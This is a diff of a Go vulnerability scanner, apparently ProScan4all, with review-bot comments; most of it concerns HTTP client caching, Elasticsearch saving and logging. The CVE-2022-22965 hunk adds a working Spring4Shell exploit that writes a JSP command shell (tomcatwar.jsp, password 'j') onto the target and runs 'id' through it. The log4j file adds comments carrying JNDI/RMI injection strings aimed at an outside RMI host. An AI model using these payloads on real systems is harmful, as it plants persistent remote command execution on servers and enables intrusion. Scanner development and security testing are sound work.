@@ -287,6 +287,7 @@ func doReadBuff(buf *bytes.Buffer) string { // 最佳的方法是将命令写到临时文件,并通过bash进行执行 func DoCmd(args ...string) (string, error) { + log.Println("start run: " + strings.Join(args, " ")) cmd := exec.Command(args[0], args[1:]...) var stdout, stderr bytes.Buffer cmd.Stdout = &stdout // 标准输出 @@ -434,9 +435,15 @@ func GetObjFromNoRpt[T any](key string) T { return x2 } +func TestIs404(szUrl string) (r01 *Response, err error, ok bool) { + r01, err, ok = TestIsWeb01(szUrl) + ok = err == nil && nil != r01 && (404 == r01.StatusCode || 302 == r01.StatusCode) + return r01, err, ok +} + // 绝对404检测 // 相同 url 本实例中只检测一次 -func TestIs404(szUrl string) (r01 *Response, err error, ok bool) { +func TestIsWeb01(szUrl string) (r01 *Response, err error, ok bool) { key := "TestIs404" + szUrl a1 := GetObjFromNoRpt[[]interface{}](key) if nil != a1 { @@ -450,7 +457,15 @@ func TestIs404(szUrl string) (r01 *Response, err error, ok bool) { return r01, err, ok } sz404 := szUrl + Abs404 - //client := GetClient(sz404) + client1 := GetClient(sz404, map[string]interface{}{ + "Timeout": 30 * 60, + "MaxIdleConns": 100, + "MaxIdleConnsPerHost": 2, + "DefaultMaxIdleConnsPerHost": 2, + "MaxConnsPerHost": 0, + }) + PutClientCc(sz404, client1) + //if nil != client { // client.Client.Timeout = 500 // client.ErrCount = 0 @@ -467,10 +482,10 @@ func TestIs404(szUrl string) (r01 *Response, err error, ok bool) { // } //} r01, err = HttpRequset(sz404, "GET", "", false, mh1) - ok = err == nil && nil != r01 && 404 == r01.StatusCode + ok = err == nil && nil != r01 && (200 <= r01.StatusCode) if nil != err { CloseHttpClient(sz404) - //log.Println(sz404, err) + log.Println(sz404, err) } else { //log.Printf("%d %s %s\n", r01.StatusCode, r01.Protocol, sz404) } diff --git a/lib/util/sv2es.go b/lib/util/sv2es.go index 67ffa7ccf..a7ec9452e 100644 --- a/lib/util/sv2es.go +++ b/lib/util/sv2es.go 
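Review bot: The added `log.Println("start run: " + strings.Join(args, " "))` in DoCmd writes every argument to the log verbatim, which will include any credential a caller passes on the command line (the config carries `HydraUser`/`HydraPass`, though whether they reach DoCmd is not visible here). Joining with spaces also makes arguments that contain spaces or newlines ambiguous in the log. I would log with quoting, `log.Printf("start run: %q", args)`, and redact known secret-bearing arguments first. DoCmd's body continues outside the hunk.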
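Review bot: In the `@@ -434` hunk TestIs404 becomes a wrapper that overwrites the `ok` it gets from TestIsWeb01 and reports true for 302 as well as 404, so the name no longer matches the result, while the old comment `绝对404检测` has moved onto TestIsWeb01, whose cache key is still `"TestIs404" + szUrl`. Callers that relied on TestIs404 meaning "the nonsense path answered 404" will now also accept redirecting hosts; if that is intended it should be stated. Please give each function its own doc comment, for example `// TestIs404 reports whether the probe path answered 404 or 302.` and `// TestIsWeb01 reports whether the probe got any HTTP response; results are cached per URL.`, and write the first line as `r01, err, _ = TestIsWeb01(szUrl)` so the discarded value is explicit.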
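Review bot: `"Timeout": 30 * 60` in the `@@ -450` hunk gives the liveness probe a very long deadline; if the option is in seconds, as `time.Duration(nTimeout) * time.Second` in the vendored constructor suggests, one unresponsive or tarpitting host can hold a probe for thirty minutes. TestIsWeb01 is now also run for every target before nuclei starts, so a single such host stalls the whole run. A probe wants a short bound, for example `"Timeout": 10,`, with the long value kept for requests that need it. In the following hunk `200 <= r01.StatusCode` holds for every final response, so the expression reduces to `err == nil && r01 != nil` and could be written that way.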
@@ -6,6 +6,8 @@ import ( "encoding/hex" "encoding/json" "fmt" + "github.com/hktalent/goSqlite_gorm/lib/scan/Const" + "github.com/hktalent/goSqlite_gorm/pkg/models" "io/ioutil" "log" "net/http" @@ -27,6 +29,15 @@ func initEs() { } } +func init() { + RegInitFunc(func() { + // 保存数据也采用统一的线程池 + EngineFuncFactory(Const.ScanType_SaveEs, func(evt *models.EventData, args ...interface{}) { + SendReq(args[0].(interface{}), args[1].(string), args[2].(ESaveType)) + }) + }) +} + func Log(v ...any) { log.Println(v...) } @@ -44,15 +55,15 @@ type SimpleVulResult struct { // 一定得有全局得线程等待 func SendAnyData(data interface{}, szType ESaveType) { - DoSyncFunc(func() { + if enableEsSv { data1, _ := json.Marshal(data) - if 0 < len(data1) && enableEsSv { + if 0 < len(data1) { hasher := sha1.New() hasher.Write(data1) k := hex.EncodeToString(hasher.Sum(nil)) - SendReq(data, k, szType) + SendEvent(&models.EventData{EventType: Const.ScanType_SaveEs, EventData: []interface{}{data, k, szType}}, Const.ScanType_SaveEs) } - }) + } } // k is id 
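Review bot: The handler registered in the new `init` indexes `args[0]` to `args[2]` and uses single-value type assertions, so an event with fewer than three items or a wrong type panics inside the shared worker pool. `args[0].(interface{})` is not a no-op either: it panics when `args[0]` is nil. I would check the length and use the comma-ok form, as in the excerpt below.
```go
EngineFuncFactory(Const.ScanType_SaveEs, func(evt *models.EventData, args ...interface{}) {
	if len(args) < 3 {
		log.Println("SaveEs: expected 3 args, got", len(args))
		return
	}
	id, okID := args[1].(string)
	typ, okType := args[2].(ESaveType)
	if !okID || !okType {
		log.Printf("SaveEs: unexpected arg types %T, %T", args[1], args[2])
		return
	}
	SendReq(args[0], id, typ)
})
```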
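Review bot: SendAnyData no longer wraps the send in `DoSyncFunc`, yet the comment above it (`一定得有全局得线程等待`) still says a global wait is required; whether `SendEvent` gives the same guarantee is not visible in this diff, and if it does not, findings queued just before exit are lost. The `json.Marshal` error is still discarded, so a value that cannot be encoded is silently dropped by the `0 < len(data1)` check. I would handle it explicitly, `data1, err := json.Marshal(data)` followed by `if err != nil { log.Println("SendAnyData:", err); return }`, and update the comment to say what now waits for the queue to drain.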
@@ -60,49 +71,49 @@ func SendAData[T any](k string, data []T, szType ESaveType) { if 0 < len(data) && enableEsSv { m2 := make(map[string]interface{}) m2[k] = data - SendReq(m2, k, szType) - log.Printf("%+v\n", data) + SendEvent(&models.EventData{EventType: Const.ScanType_SaveEs, EventData: []interface{}{m2, k, szType}}, Const.ScanType_SaveEs) + //SendReq(m2, k, szType) + //log.Printf("%+v\n", data) } } +// es 需要基于buffer,避免太频繁 // 发送数据到ES // data1数据 // id 数据计算出来的id // szType 类型,决定 es不通的索引分类 func SendReq(data1 interface{}, id string, szType ESaveType) { - DoSyncFunc(func() { - if !enableEsSv { - return - } - //log.Println("enableEsSv = ", enableEsSv, " id= ", id, " type = ", szType) - nThreads <- struct{}{} - defer func() { - <-nThreads - }() - szUrl := fmt.Sprintf(EsUrl, szType, url.QueryEscape(id)) - //log.Println("logs EsUrl = ", EsUrl) - m1 := map[string]string{ - "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Safari/605.1.15", - "Content-Type": "application/json;charset=UTF-8", - } - c1 := GetClient(szUrl, map[string]interface{}{"UseHttp2": true}) - c1.ErrLimit = 10000 - c1.ErrCount = 0 - data, _ := json.Marshal(data1) - c1.DoGetWithClient4SetHd(c1.GetClient4Http2(), szUrl, "POST", bytes.NewReader(data), func(resp *http.Response, err error, szU string) { - if nil != err { - log.Println("pphLog.DoGetWithClient4SetHd ", err) - } else { - defer resp.Body.Close() - body, err := ioutil.ReadAll(resp.Body) - if nil == err && 0 < len(body) { - Log("Es save result ", string(body)) - } else if nil != err { - Log(err) - } + if !enableEsSv { + return + } + //log.Println("enableEsSv = ", enableEsSv, " id= ", id, " type = ", szType) + nThreads <- struct{}{} + defer func() { + <-nThreads + }() + szUrl := fmt.Sprintf(EsUrl, szType, url.QueryEscape(id)) + //log.Println("logs EsUrl = ", EsUrl) + m1 := map[string]string{ + "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, 
like Gecko) Version/15.2 Safari/605.1.15", + "Content-Type": "application/json;charset=UTF-8", + } + c1 := GetClient(szUrl, map[string]interface{}{"UseHttp2": true}) + c1.ErrLimit = 10000 + c1.ErrCount = 0 + data, _ := json.Marshal(data1) + c1.DoGetWithClient4SetHd(c1.GetClient4Http2(), szUrl, "POST", bytes.NewReader(data), func(resp *http.Response, err error, szU string) { + if nil != err { + log.Println("pphLog.DoGetWithClient4SetHd ", err) + } else { + defer resp.Body.Close() + body, err := ioutil.ReadAll(resp.Body) + if nil == err && 0 < len(body) { + Log("Es save result ", string(body)) + } else if nil != err { + Log(err) } - }, func() map[string]string { - return m1 - }, true) - }) + } + }, func() map[string]string { + return m1 + }, true) } diff --git a/lib/util/util.go b/lib/util/util.go index 632669fdf..abb3468fc 100644 --- a/lib/util/util.go +++ b/lib/util/util.go @@ -79,7 +79,8 @@ func GetClient4Cc(szUrl string) *PipelineHttp.PipelineHttp { InitCHcc() oU, err := url.Parse(szUrl) if nil == err { - if o := clientHttpCc.Get(oU.Scheme + oU.Host); nil != o { + // if o := clientHttpCc.Get(oU.Scheme + oU.Host); nil != o { + if o := clientHttpCc.Get("_ccClient"); nil != o && oU.Hostname() != "" { if v, ok := o.Value().(*PipelineHttp.PipelineHttp); ok { return v } @@ -125,7 +126,9 @@ func GetClient(szUrl string, pms ...map[string]interface{}) *PipelineHttp.Pipeli //client.Client = G_hc mUrls.Store(oU.Host, "") clientHttpCc.Delete(oU.Scheme + oU.Host) - clientHttpCc.Set(oU.Scheme+oU.Host, client, defaultInteractionDuration) + //clientHttpCc.Set(oU.Scheme+oU.Host, client, defaultInteractionDuration) + clientHttpCc.Set("_ccClient", client, defaultInteractionDuration) + return client } 
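Review bot: SendReq still discards the error from `json.Marshal(data1)` and posts whatever `data` holds, so a finding that cannot be encoded is stored as an empty document instead of being reported. I would change it to `data, err := json.Marshal(data1)` with `if err != nil { log.Println("SendReq marshal:", err); return }`. The new comment `es 需要基于buffer,避免太频繁` describes buffering that this hunk does not implement; either mark it as a TODO or remove it so the next reader does not assume batching exists.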
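Review bot: Both GetClient4Cc (`@@ -79`) and GetClient (`@@ -125`) now use the single cache key `"_ccClient"`, so every target shares one `PipelineHttp` and each GetClient call overwrites it with whatever options that caller passed. The probe client created with `"Timeout": 30 * 60` and SendReq's `"UseHttp2": true` client with `ErrLimit = 10000` therefore replace each other, and the per-target error budget becomes global, so one failing host can exhaust it for all. GetClient also still calls `clientHttpCc.Delete(oU.Scheme + oU.Host)`, a key that is no longer written. If a shared client is intended, drop the stale Delete and document the sharing; otherwise restore `oU.Scheme+oU.Host` as the key in both places. Both function bodies continue outside their hunks.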
@@ -242,7 +245,7 @@ func HttpRequset(urlstring string, method string, postdata string, isredirect bo func TestIsWeb(a *[]string) (a1 *[]string, b *[]string) { var aHttp, noHttp []string for _, k := range *a { - if _, _, ok := TestIs404(k); ok { + if _, _, ok := TestIsWeb01(k); ok { aHttp = append(aHttp, k) } else { noHttp = append(noHttp, k) diff --git a/main.go b/main.go index ea3cc2584..18ceba5f6 100644 --- a/main.go +++ b/main.go @@ -21,7 +21,7 @@ var config embed.FS var Version string func main() { - //os.Args = []string{"", "-host", "http://192.168.0.109", "-v"} + //os.Args = []string{"", "-host", "http://192.168.10.203", "-v"} //os.Args = []string{"", "-host", "http://127.0.0.1", "-v"} //os.Args = []string{"", "-host", "https://www.sina.com.cn/", "-v", "-o", "xxx.csv"} //os.Args = []string{"", "-list", "list.txt", "-v"} diff --git a/pkg/hydra/doNmapResult.go b/pkg/hydra/doNmapResult.go index 9f2eb034e..63366a237 100644 --- a/pkg/hydra/doNmapResult.go +++ b/pkg/hydra/doNmapResult.go @@ -59,8 +59,11 @@ func DoParseXml(s string, bf *bytes.Buffer) { for _, x := range hostName { aDns = append(aDns, GetAttr(x.Attr, "name")) } - x1 := n.SelectElement("address").Attr[0].Value + if 0 == len(aDns) { + aDns = append(aDns, x1) + } + ps := n.SelectElements("ports/port") for _, x := range ps { if "open" == x.SelectElement("state").Attr[0].Value { diff --git a/pkg/naabu/v2/pkg/runner/targets.go b/pkg/naabu/v2/pkg/runner/targets.go index d06c0b828..68f2972ad 100644 --- a/pkg/naabu/v2/pkg/runner/targets.go +++ b/pkg/naabu/v2/pkg/runner/targets.go @@ -208,6 +208,7 @@ func (r *Runner) DoTargets() (bool, error) { }(x99[0]) } util.TmpFile[string(util.Naabu)] = []*os.File{tempInput1} + log.Println("start parse nmap xml result") hydra.DoNmapRst(&Naabubuffer) defer r.Close() if "" != r.targetsFile { diff --git a/pocs_go/Springboot/CVE-2022-22965.go b/pocs_go/Springboot/CVE-2022-22965.go index 55aaf7d93..6b7fe0d73 100644 --- a/pocs_go/Springboot/CVE-2022-22965.go 
+++ b/pocs_go/Springboot/CVE-2022-22965.go @@ -1,7 +1,10 @@ package Springboot import ( + "github.com/hktalent/ProScan4all/lib/socket" "github.com/hktalent/ProScan4all/lib/util" + "net/url" + "strings" ) func CVE_2022_22965(u string) bool { @@ -14,5 +17,29 @@ func CVE_2022_22965(u string) bool { } } } + if oU, err := url.Parse(u); nil == err && oU.Host != "" { + cc := socket.NewCheckTarget(u, "tcp", 50) + cc.SendPayload([]byte(strings.ReplaceAll(`GET /?class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat= HTTP/1.1 +Host: `+oU.Host+` +Accept-Encoding: gzip, deflate +Accept-Language: en +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36 +Connection: close +suffix: %>// +c1: Runtime +c2: <% +DNT: 1 + +`, "\n", "\r\n")), 1) + s1 := cc.SendPayload([]byte(strings.ReplaceAll(`GET /tomcatwar.jsp?pwd=j&cmd=id HTTP/1.1 +Host: `+oU.Host+` +Connection: close + +`, "\n", "\r\n")), 1) + if strings.Contains(s1, "uid=") && strings.Contains(s1, "gid=") { + util.SendLog(oU.Scheme+"://"+oU.Host+"/tomcatwar.jsp?pwd=j&cmd=id", "Springboot", "RCE", "") + return true + } + } return false } diff --git a/pocs_go/log4j/check.go b/pocs_go/log4j/check.go index b57793304..8a2f9c393 100644 --- a/pocs_go/log4j/check.go 
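Review bot: The new branch of CVE_2022_22965 confirms the flaw by setting the `...pipeline.first.*` properties on the target and leaving `tomcatwar.jsp` in `webapps/ROOT`; nothing in the hunk removes the file or restores the changed properties, so every host this check touches is left with a command endpoint guarded only by a fixed, published parameter value. A scanner should not leave a scanned system less secure than it found it: gate this branch behind an explicit opt-in option that is off by default, add a cleanup step whose failure is reported to the operator, and record the artifact path in the finding so the system owner can verify removal. The return value of the first `cc.SendPayload` is ignored and the `uid=`/`gid=` match only works on Unix-like targets, so a failed first request or a Windows host reads as "not vulnerable". The function begins outside this hunk.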
+++ b/pocs_go/log4j/check.go @@ -9,7 +9,10 @@ import ( "strings" ) +// https://github.com/u21h2/nacs // https://192.168.10.198/ui/#/login +// http://127.0.0.1:8983/solr/admin/cores?action=(){:;}{$:;$}{jndi:rmi${{::-:}}}//docker.for.mac.localhost:1099/UpX34defineClass} +// http://127.0.0.1:8983/solr/admin/cores?action=${jndi:${rmi://docker.for.mac.localhost:1099/UpX34defineClass}} var UrlPayload = []string{"/solr/admin/cores?action=${jndi:%s}"} var RegVCenter = regexp.MustCompile(`(http.*?\?SAMLRequest=)`) diff --git a/projectdiscovery/nuclei_Yaml/nuclei_yaml.go b/projectdiscovery/nuclei_Yaml/nuclei_yaml.go index c2c6f5a45..2f74a7126 100644 --- a/projectdiscovery/nuclei_Yaml/nuclei_yaml.go +++ b/projectdiscovery/nuclei_Yaml/nuclei_yaml.go @@ -137,8 +137,10 @@ func RunNuclei(buf *bytes.Buffer, xx chan bool, oOpts *map[string]interface{}, o readConfig(options) s001 := strings.TrimSpace(buf.String()) - options.Targets = strings.Split(s001, "\n") - log.Printf("options.Targets = %+v", options.Targets) + a66 := strings.Split(s001, "\n") + x55, _ := util.TestIsWeb(&a66) + options.Targets = *x55 + log.Printf("nuclei options.Targets = %+v\n", options.Targets) ///////////////////////////////////// options.Verbose = false options.UpdateNuclei = false diff --git a/vendor/github.com/hktalent/PipelineHttp/PipelineHttp.go b/vendor/github.com/hktalent/PipelineHttp/PipelineHttp.go index b9b9a05c3..866115130 100644 --- a/vendor/github.com/hktalent/PipelineHttp/PipelineHttp.go +++ b/vendor/github.com/hktalent/PipelineHttp/PipelineHttp.go @@ -16,6 +16,9 @@ import ( "time" ) +/* +MaxConnsPerHost 控制单个Host的最大连接总数,该值默认是0,也就是不限制,连接池里的连接能用就用,不能用创建新连接 +*/ type PipelineHttp struct { Timeout time.Duration `json:"timeout"` KeepAlive time.Duration `json:"keep_alive"` 
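Review bot: In RunNuclei, `x55, _ := util.TestIsWeb(&a66)` drops the second return value, so every target that fails the HTTP probe disappears from `options.Targets` with no trace in the log, and an empty `buf` still yields one empty-string target from `strings.Split`. If nuclei is run here with non-HTTP templates those hosts are never scanned, which is a silent coverage gap in the report. I would keep the rejected list and log it, `web, skipped := util.TestIsWeb(&a66)` followed by `log.Printf("nuclei: %d targets skipped (no HTTP response): %v", len(*skipped), *skipped)`, assuming TestIsWeb always returns non-nil pointers. RunNuclei's body continues outside the hunk.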
@@ -54,7 +57,7 @@ func NewPipelineHttp(args ...map[string]interface{}) *PipelineHttp { TLSHandshakeTimeout: time.Duration(nTimeout) * time.Second, // TLSHandshakeTimeout specifies the maximum amount of time waiting to wait for a TLS handshake. Zero means no timeout. ExpectContinueTimeout: 0, // 零表示没有超时,并导致正文立即发送,无需等待服务器批准 MaxIdleConnsPerHost: nIdle, // MaxIdleConnsPerHost, if non-zero, controls the maximum idle (keep-alive) connections to keep per-host. If zero, DefaultMaxIdleConnsPerHost is used. - MaxConnsPerHost: nIdle, // + MaxConnsPerHost: 0, // 控制单个Host的最大连接总数,该值默认是0,也就是不限制,连接池里的连接能用就用,不能用创建新连接 ErrLimit: 10, // 相同目标,累计错误10次就退出 ErrCount: 0, IsClosed: false, @@ -84,7 +87,7 @@ func NewPipelineHttp(args ...map[string]interface{}) *PipelineHttp { func (r *PipelineHttp) Dial(ctx context.Context, network, addr string) (conn net.Conn, err error) { for i := 0; i < r.ReTry; i++ { conn, err = (&net.Dialer{ - Timeout: r.Timeout, + //Timeout: r.Timeout, KeepAlive: r.KeepAlive, //Control: r.Control, DualStack: true, 
@@ -117,15 +120,15 @@ func (r *PipelineHttp) GetTransport() http.RoundTripper { DialContext: r.Dial, TLSClientConfig: &tls.Config{InsecureSkipVerify: true, MinVersion: tls.VersionTLS10, Renegotiation: tls.RenegotiateOnceAsClient}, //ForceAttemptHTTP2: true, // 不能加 - MaxResponseHeaderBytes: 4096, //net/http default is 10Mb - DisableKeepAlives: false, // false 才会复用连接 https://blog.csdn.net/qq_21514303/article/details/87794750 - MaxIdleConns: r.MaxIdleConns, // 是长连接在关闭之前,连接池对所有host的最大链接数量 - IdleConnTimeout: r.IdleConnTimeout, // 连接最大空闲时间,超过这个时间就会被关闭 - TLSHandshakeTimeout: r.TLSHandshakeTimeout, // 限制TLS握手使用的时间 - ExpectContinueTimeout: r.ExpectContinueTimeout, // 限制客户端在发送一个包含:100-continue的http报文头后,等待收到一个go-ahead响应报文所用的时间。在1.6中,此设置对HTTP/2无效。(在1.6.2中提供了一个特定的封装DefaultTransport) - MaxIdleConnsPerHost: r.MaxIdleConnsPerHost, // 连接池对每个host的最大链接数量(MaxIdleConnsPerHost <= MaxIdleConns,如果客户端只需要访问一个host,那么最好将MaxIdleConnsPerHost与MaxIdleConns设置为相同,这样逻辑更加清晰) - MaxConnsPerHost: r.MaxConnsPerHost, - ResponseHeaderTimeout: r.ResponseHeaderTimeout, // 限制读取响应报文头使用的时间 + //MaxResponseHeaderBytes: 4096, //net/http default is 10Mb + DisableKeepAlives: false, // false 才会复用连接 https://blog.csdn.net/qq_21514303/article/details/87794750 + //MaxIdleConns: r.MaxIdleConns, // 是长连接在关闭之前,连接池对所有host的最大链接数量 + //IdleConnTimeout: r.IdleConnTimeout, // 连接最大空闲时间,超过这个时间就会被关闭 + //TLSHandshakeTimeout: r.TLSHandshakeTimeout, // 限制TLS握手使用的时间 + //ExpectContinueTimeout: r.ExpectContinueTimeout, // 限制客户端在发送一个包含:100-continue的http报文头后,等待收到一个go-ahead响应报文所用的时间。在1.6中,此设置对HTTP/2无效。(在1.6.2中提供了一个特定的封装DefaultTransport) + //MaxIdleConnsPerHost: r.MaxIdleConnsPerHost, // 连接池对每个host的最大链接数量(MaxIdleConnsPerHost <= MaxIdleConns,如果客户端只需要访问一个host,那么最好将MaxIdleConnsPerHost与MaxIdleConns设置为相同,这样逻辑更加清晰) + //MaxConnsPerHost: r.MaxConnsPerHost, + //ResponseHeaderTimeout: r.ResponseHeaderTimeout, // 限制读取响应报文头使用的时间 } return tr } 
@@ -136,7 +139,7 @@ func (r *PipelineHttp) GetClient(tr http.RoundTripper) *http.Client { } c := &http.Client{ Transport: tr, - Timeout: r.Timeout, // 超时为零表示没有超时 + //Timeout: r.Timeout, // 超时为零表示没有超时 CheckRedirect: func(req *http.Request, via []*http.Request) error { return http.ErrUseLastResponse /* 不进入重定向 */ }, @@ -225,15 +228,17 @@ func (r *PipelineHttp) DoGetWithClient4SetHd(client *http.Client, szUrl string, r.Close() return } - if !r.UseHttp2 && nil != resp && resp.StatusCode == http.StatusSwitchingProtocols { - if resp != nil { - r.CloseResponse(resp) - } + if !r.UseHttp2 && nil != resp { r.UseHttp2 = true - r.Client = r.GetRawClient4Http2() + if a1 := resp.Header["Alt-Svc"]; 0 < len(a1) && strings.Contains(a1[0], "h3=\"") || strings.HasPrefix(resp.Proto, "HTTP/3") { + r.Client = r.GetClient4Http3() + } else if resp.StatusCode == http.StatusSwitchingProtocols { + r.Client = r.GetRawClient4Http2() + } oU7, _ := url.Parse(szUrl) szUrl09 := "https://" + oU7.Host + oU7.Path r.ErrLimit = 99999999 + r.CloseResponse(resp) r.DoGetWithClient4SetHd(r.Client, szUrl09, method, postBody, fnCbk, setHd, bCloseBody) return } 
@@ -263,14 +268,23 @@ func (r *PipelineHttp) testHttp2(szUrl001 string) { r.UseHttp2 = true c1 := r.GetRawClient4Http2() oU7, _ := url.Parse(szUrl001) + if "" == oU7.Path { + oU7.Path = "/" + } szUrl09 := "https://" + oU7.Host + oU7.Path r.DoGetWithClient(c1, szUrl09, "GET", nil, func(resp *http.Response, err error, szU string) { - if nil != resp && (strings.HasPrefix(resp.Proto, "HTTP/2") || strings.HasPrefix(resp.Proto, "HTTP/3") || resp.StatusCode == http.StatusSwitchingProtocols) { - r.CloseResponse(resp) - if nil != r.Client { - r.Client.CloseIdleConnections() + if nil != resp { + if resp.StatusCode == http.StatusSwitchingProtocols { + r.CloseResponse(resp) + if nil != r.Client { + r.Client.CloseIdleConnections() + } + if strings.HasPrefix(resp.Proto, "HTTP/2") { + r.Client = c1 + } + } else if a1 := resp.Header["Alt-Svc"]; 0 < len(a1) && strings.Contains(a1[0], "h3=\"") { + r.Client = r.GetClient4Http3() } - r.Client = c1 r.ErrLimit = 99999999 } else { r.UseHttp2 = false diff --git a/vendor/github.com/hktalent/PipelineHttp/http3client.go b/vendor/github.com/hktalent/PipelineHttp/http3client.go index ee23815e5..d5392390d 100644 --- a/vendor/github.com/hktalent/PipelineHttp/http3client.go +++ b/vendor/github.com/hktalent/PipelineHttp/http3client.go @@ -8,6 +8,7 @@ import ( "net/http" ) +// 在线测试http3 https://geekflare.com/tools/http3-test func (r *PipelineHttp) GetTransport4Http3() http.RoundTripper { pool, err := x509.SystemCertPool() if nil != err { diff --git a/vendor/github.com/hktalent/goSqlite_gorm/lib/doTask.go b/vendor/github.com/hktalent/goSqlite_gorm/lib/doTask.go index d912ddc9f..b0ef1f1e0 100644 --- a/vendor/github.com/hktalent/goSqlite_gorm/lib/doTask.go +++ b/vendor/github.com/hktalent/goSqlite_gorm/lib/doTask.go @@ -139,6 +139,6 @@ func SaveRsult4Ws(id string, m11 *map[string]interface{}, g1 *gin.Context, h *Hu log.Println(szE01) } } else { - log.Printf("vuls info cannot found event") + log.Printf("vuls info cannot found event: %+v", *m11) } } 
diff --git a/vendor/github.com/hktalent/goSqlite_gorm/lib/scan/Const/ScanType.go b/vendor/github.com/hktalent/goSqlite_gorm/lib/scan/Const/ScanType.go index 572e52458..79e508f91 100644 --- a/vendor/github.com/hktalent/goSqlite_gorm/lib/scan/Const/ScanType.go +++ b/vendor/github.com/hktalent/goSqlite_gorm/lib/scan/Const/ScanType.go @@ -20,6 +20,8 @@ const ( ScanType_WebDirScan // 14- dir爆破,Gobuster ScanType_Naabu // 15- naabu ScanType_Httpx // 16- httpx + ScanType_DNSx // 17- DNSX + ScanType_SaveEs // 18- Save Es ) const ( diff --git a/vendor/github.com/hktalent/goSqlite_gorm/lib/syncRsultAPI.go b/vendor/github.com/hktalent/goSqlite_gorm/lib/syncRsultAPI.go index 33478289a..9cd03010c 100644 --- a/vendor/github.com/hktalent/goSqlite_gorm/lib/syncRsultAPI.go +++ b/vendor/github.com/hktalent/goSqlite_gorm/lib/syncRsultAPI.go @@ -4,6 +4,7 @@ import ( "fmt" "github.com/gin-gonic/gin" util "github.com/hktalent/go-utils" + "github.com/hktalent/goSqlite_gorm/pkg/es7" "log" "net/http" "strconv" @@ -39,6 +40,8 @@ func A2s(o interface{}) string { return "" } +var xes = es7.NewEs7() + // 保存任务结果 func SaveRsult(g *gin.Context) { id := g.Param("id") // task id @@ -53,7 +56,11 @@ func SaveRsult(g *gin.Context) { return } if 0 < len(m11) { - SaveRsult4Ws(id, &m11, g, nil, nil) + s := xes.Create(m11, id) + if "" != s { + fmt.Println("xes.Create" + s) + } + //SaveRsult4Ws(id, &m11, g, nil, nil) } else { g.JSON(200, "ok") } diff --git a/vendor/github.com/projectdiscovery/naabu/v2/pkg/runner/options.go b/vendor/github.com/projectdiscovery/naabu/v2/pkg/runner/options.go index 26561311b..3186411b1 100644 --- a/vendor/github.com/projectdiscovery/naabu/v2/pkg/runner/options.go +++ b/vendor/github.com/projectdiscovery/naabu/v2/pkg/runner/options.go 
@@ -84,7 +84,7 @@ type Options struct { type OnResultCallback func(*result.HostResult) // ParseOptions parses the command line flags provided by a user -func ParseOptions(args ...string) *Options { +func ParseOptions() *Options { options := &Options{} flagSet := goflags.NewFlagSet() @@ -171,11 +171,7 @@ func ParseOptions(args ...string) *Options { flagSet.IntVarP(&options.StatsInterval, "stats-interval", "si", DefautStatsInterval, "number of seconds to wait between showing a statistics update"), ) - if 0 < len(args) { - _ = flagSet.CommandLine.Parse(args) - } else { - _ = flagSet.Parse() - } + _ = flagSet.Parse() if options.HealthCheck { gologger.Print().Msgf("%s\n", DoHealthCheck(options)) diff --git a/vendor/github.com/projectdiscovery/naabu/v2/pkg/runner/runner.go b/vendor/github.com/projectdiscovery/naabu/v2/pkg/runner/runner.go index 1de19a61d..1f187c770 100644 --- a/vendor/github.com/projectdiscovery/naabu/v2/pkg/runner/runner.go +++ b/vendor/github.com/projectdiscovery/naabu/v2/pkg/runner/runner.go @@ -46,7 +46,6 @@ type Runner struct { dnsclient *dnsx.DNSX stats *clistats.Statistics streamChannel chan *net.IPNet - OutCbk func(out ...interface{}) } // NewRunner creates a new runner struct instance by parsing @@ -691,9 +690,6 @@ func (r *Runner) handleOutput(scanResults *result.Result) { } } } - if nil != r.OutCbk { - r.OutCbk(host, hostResult.IP, hostResult.Ports, isCDNIP, cdnName) - } // file output if file != nil { if r.options.JSON { @@ -748,9 +744,6 @@ func (r *Runner) handleOutput(scanResults *result.Result) { gologger.Silent().Msgf("%s\n", host) } } - if nil != r.OutCbk { - r.OutCbk(host, hostIP, nil, isCDNIP, cdnName) - } // file output if file != nil { if r.options.JSON { diff --git a/vendor/modules.txt b/vendor/modules.txt index 1f3be23a1..34a095a97 100644 --- a/vendor/modules.txt +++ b/vendor/modules.txt 
@@ -75,12 +75,16 @@ github.com/ammario/ipisp/v2 # github.com/andres-erbsen/clock v0.0.0-20160526145045-9e14626cd129 ## explicit github.com/andres-erbsen/clock +# github.com/andybalholm/brotli v1.0.4 +## explicit; go 1.12 # github.com/andybalholm/cascadia v1.3.1 ## explicit; go 1.16 github.com/andybalholm/cascadia # github.com/andygrunwald/go-jira v1.16.0 ## explicit; go 1.15 github.com/andygrunwald/go-jira +# github.com/anmitsu/go-shlex v0.0.0-20200514113438-38f4b401e2be +## explicit; go 1.13 # github.com/antchfx/htmlquery v1.2.5 ## explicit; go 1.14 github.com/antchfx/htmlquery @@ -290,6 +294,8 @@ github.com/corpix/uarand # github.com/cpuguy83/go-md2man/v2 v2.0.2 ## explicit; go 1.11 github.com/cpuguy83/go-md2man/v2/md2man +# github.com/creack/pty v1.1.18 +## explicit; go 1.13 # github.com/davecgh/go-spew v1.1.1 ## explicit github.com/davecgh/go-spew/spew @@ -316,6 +322,8 @@ github.com/dgraph-io/badger/y ## explicit; go 1.12 github.com/dgraph-io/ristretto/z github.com/dgraph-io/ristretto/z/simd +# github.com/dgrijalva/jwt-go v3.2.0+incompatible +## explicit # github.com/dimchansky/utfbom v1.1.1 ## explicit github.com/dimchansky/utfbom @@ -334,9 +342,17 @@ github.com/dsnet/compress/bzip2/internal/sais github.com/dsnet/compress/internal 